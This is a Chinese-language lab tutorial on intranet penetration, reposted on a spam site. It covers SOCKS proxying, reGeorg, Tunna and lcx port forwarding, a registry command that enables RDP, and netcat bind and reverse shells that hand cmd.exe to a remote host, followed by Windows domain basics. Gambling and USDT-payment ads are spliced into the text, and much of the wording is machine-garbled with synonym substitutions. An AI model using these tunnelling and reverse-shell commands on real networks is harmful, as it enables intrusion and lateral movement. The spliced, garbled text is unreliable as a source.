皇冠体育寻求亚洲战略合作伙伴,皇冠代理招募中,皇冠平台开放会员注册、充值、提现、电脑版下载、APP下载。

首页科技正文

usdt支付接口(caibao.it):内网渗透 / 转发署理

admin2020-12-2423安全技术众测渗透

内网渗透 / 转发署理

前言

菜狗一个,学到太少了,内网渗透之前也没有怎么接触过,从现在起就最先好好学习一番,争取早点脱节菜狗称呼。

0x01:内网转发

在举行渗透测试历程中会遇到到内网中的其他机械是不允许外网机械接见的,因此需要通过端口转发(即隧道)或将获得的外网服务器设置为署理,使得攻击机可以直接接见并操作内网中的其他机械,这一历程就叫做内网转发。

端口映射

端口映射是将一台主机的内网(LAN)IP地址映射成一个公网(WAN)IP地址,当用户接见提供映射端口主机的某个端口时,服务器将请求转移到内陆局域网内部提供这种特定服务的主机;

0x02:Socket协媾和Socks协议

socket协议

socket 被翻译为“套接字”,是盘算机之间举行通讯的一种约定或一种方式。通过 socket 这种约定,一台盘算机可以吸收其他盘算机的数据,也可以向其他盘算机发送数据。

Socks协议

Socks 是一种会话层署理协议,设计的最初目的是辅助授权用户突破防火墙的限制,获取普通用户不能接见的外部资源。考虑到险些所有基于 TCP/IP 的应用软件都使用 socket 举行数据通讯,为了便于应用软件的设计和开发,该协议针对 socket 中几种经典操作举行了针对设计,并将其定名为 Socks普遍使用的协议版本是 Socks4 和 Socks5

协议历程
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第1张

  1. 客户端毗邻上署理服务器之后需要发送请求见告服务器现在的socks协议版本以及支持的认证方式。
  2. 署理服务器收到请求后凭据其设定的认证方式返回给客户端
  3. 若是署理服务器不需要认证,客户端将直接向署理服务器提议真实请求
  4. 署理服务器收到该请求之后毗邻客户端请求的目的服务器
  5. 署理服务器最先转发客户端与目的服务器之间的流量

0x03:署理

正向署理

正向署理即是客户端署理, 署理客户端, 服务端不知道现实提议请求的客户端.
正向署理类似一个跳板机,如下图,通过署理机接见外部资源。

,好比海内接见谷歌,直接接见不到
客户端发送数据到署理服务器上,再由署理服务器转发给谷歌获取数据,再返回给客户端
Lhost-->proxy-->Rhost

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第2张
用途:

  1. 接见到原来接见不到的资源
  2. 可以做缓存,加速接见资源
  3. 署理可以对外隐藏用户信息

反向署理

反向署理指的是服务器端署理,署理服务器,客户端不知道现实提供服务的服务器。
以署理服务器来接受internet上的毗邻请求,然后将请求转发给内部网络上的服务器,并将从服务器上获得的效果返回给internet上请求毗邻的客户端,此时署理服务器对外就表现为一个服务器

Lhost<-->proxy<-->firewall<-->Rhost

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第3张
作用:

  1. 保证内网平安,防止Web攻击,大型网站,通常将反向署理作为公网接见地址,Web服务器是内网。
  2. 实现负载平衡,优化网站的负载

0x04:内网署理转发的方式

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第4张

实验环境:

  1. 攻击机械 192.168.13.128
  2. 外网服务器&内网网卡 192.168.13.129/192.168.142.130
  3. 内网服务器 192.168.142.128
    ,,,, reGeorg+proxifier 正向署理

reGeorg是reDuh的继承者,行使了会话层的socks5协议,而Proxifier是一款壮大的socks5客户端,可以让不支持通过署理服务器事情的网络能通过HTTPS或SOCKS署理或署理链。该文件下支持php,asp,jsp,aspx。在平安测试历程中,可以行使他们的组合完成从外网到内网的通讯。

模拟的reGeorg转发视图:
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第5张
这里简朴演示一下这个组合要若何举行行使:

拿到一台外网服务器,这台服务器与内网服务器相连,下面将reGeorg对应的剧本上传到服务器端
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第6张
直接接见上传的剧本文件,泛起 Georg says, 'All seems fine' ,示意剧本运行正常
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第7张
运行reGerog 监听本机一个端口:

python2 reGeorgSocksProxy.py -p 8080 -u http://192.168.66.131/tunnel.nosocket.php

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第8张
由于是基于socks5,以是内陆还需要一个socks5署理工具,这里就用到了proxifier,首先对proxifier举行设置。

使用proxifier需要注重几点:

  • direct示意不使用socks5署理,直接请求
  • block示意阻断请求
  • proxy socks5示意使用socks5署理服务
  • 默认不使用proxy socks5,仅对需要的程序使用socks5署理服务

先编辑内陆署理服务器,端口就填适才监听的
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第9张
接下来设置署理规则
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第10张
这样就可以接见内网的服务了

Tunna 正向署理**

Tunna:可以通过HTTP封装隧道通讯任何TCP,以及用于绕过防火墙环境中的网络限制

常用参数:
-u 远程署理脚内陆址
-l 示意内陆监听的端口
-r 远程映射端口
-v 输出详细数据
-a 署理远程毗邻的主机地址

在获得的外网服务器WEB目录上放入Tunna工具
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第11张
在攻击机上接见
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第12张
在攻击主机上执行命令,将内网服务器(192.168.142.128)的3389端口映射到内陆5555端口

python proxy.py -u http://192.168.13.129/conn.php -l 5555 -a 192.168.142.128 -r 3389 v

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第13张
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第14张

LCX端口转发

Lcx是一款端口转发工具,有三个功效:
1、将内陆端口转发到远程主机某个端口上
2、将内陆端口转发到内陆另一个端口上
3、举行监听并举行转发使用

条件:
在端口转发的时刻需要一台公网服务器
使用场景:
多用于被控制盘算机处于内网的时刻,被控制机可能中了木马程序,虽然能够举行控制,但照样没有使用远程终端登录到本机举行治理利便,因此在许多情况下,都市想方设法在被控制盘算机上开启3389端口,通过lcx等举行端口转发,进而在内陆毗邻到被控制盘算机的远程终端并举行治理和使用。在没有端口转发的情况下外网主机是不能直接毗邻内网主机的,然则lcx工具可以将内网主机(收支内网主机的需要能够ping通互联网)的某个端口转发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面(用的最多的是3389),这样就可以直接远程毗邻反弹的端口,便可以与内网主机举行通讯。

Windows

,

AllbetGmaing手机版下载ALLbet6.com

欢迎进入AllbetGmaing手机版下载(Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

,
Usage:lcx-<listen|tran|slave> <option> [-log logfile]

-tran <守候毗邻的端口> <目的ip> <目的端口>  (端口映射)

-listen <监听slave请求的端口(对应slave 的第二个参数)> <守候毗邻的端口>  (端口转发)

-slave <你的ip> <监听端口(对应listen的第一个参数)> <目的ip> <目的端口>  (端口转发)

1、在外网中转服务器上运行

lcx -listen 8888 10000

监听内陆8888端口,同时将数据转发到10000端口
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第15张
2、内网需要转发的机械上运行并开启3389端口

lcx -slave 192.168.142.130 8888 192.168.142.128 3389
,开启3389端口-Win7、Win2003、XP系统
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

将内网的3389端口转发到外网的8888端口上
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第16张
通过毗邻外网服务器的10000端口就可以毗邻到那台内网主机的3389端口
usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第17张

rdesktop 192.168.13.129:10000

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第18张
转发乐成

NC 反弹CMDshell

NC就是在两台电脑之间确立链接,并返回两个数据流

1、正向毗邻
在内网机械上:

nc -l -p 8888 -t -e cmd.exe

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第19张
在公网机械上:

nc -nvv 192.168.142.128 8888

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第20张
2、反向毗邻
在公网机械上:

nc -l -p 8888

在内网机械上:

nc -t -e cmd.exe 192.168.142.130 8888

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第21张
上面只是在我们发现有内网服务器的时刻举行的署理转发操作,那若何去发现有内网服务器以及信息网络那?

0x05:内网环境探测/信息网络

0x06:域渗透

域的基础知识

域(Domain)

将网络中多台盘算机逻辑上组织到一起,举行集中治理,这种区别于事情组的逻辑环境叫做域,域是组织与存储资源的焦点治理单元。
域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是平安界限。域治理员只能治理域的内部,除非其他的域显式地赋予他治理权限,他才能够接见或者治理其他的域,每个域都有自己的平安策略,以及它与其他域的平安信托关系。

域控(DC)

在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和平安数据库。域控是流动目录的存储地方,即流动目录存储在域控制器内。
安装了流动目录的盘算机就称为域控制器,其实在第一次安装流动目录的时刻,安装流动目录的那台盘算机就成为了域控制器。一个域可以有一台或多台域控制器。最经典的做法是做一个主辅域控。

流动目录(AD)

流动目录是微软Windows Server中,卖力架构中大型网路环境的集中式目录治理服务。
流动目录的逻辑结构包裹:域(Domain)、域树(Domain Tree)、林(Forest)和组织单元(Organization Unit)

usdt支付接口(caibao.it):内网渗透 / 转发署理 安全技术 众测渗透 第22张

事情组的基础知识

事情组(Work Group)

事情组是局域网中的一个观点,由许多在统一物理地址,而且被相同的局域网毗邻起来的用户组成的小组,也可以是遍布一个机构的,但却被统一网络毗邻的用户组成的逻辑小组。
事情组就是将差别的电脑按功效划分列入差别的组中。

事情组的事情模式:

事情组网络也称为“对等式”的网络,由于网络中每台盘算机的职位都是同等的,它们的资源以及治理是涣散在每台盘算机之上,以是事情组环境的特点就是涣散治理,事情组环境中的每台盘算机都有自己的“本机平安账户数据库”,称为SAM数据库。

域和事情组的区别

事情组是一群盘算机的聚集,它仅仅是一个逻辑的聚集,各自盘算机照样各自治理的,你要接见其中的盘算机,照样要到被接见盘算机上来实现用户验证的。而域差别,域是一个有平安界限的盘算机聚集,在统一个域中的盘算机彼此之间已经确立了信托关系,在域内接见其他机械,不再需要被接见机械的允许了。

总结

这次先学习一下若何举行转发署理以及领会一下基础理论,下次就来学习一下内网、域的环境探测以及信息网络的方式。

参考博客

https://www.cnblogs.com/taostaryu/p/10547132.html


网友评论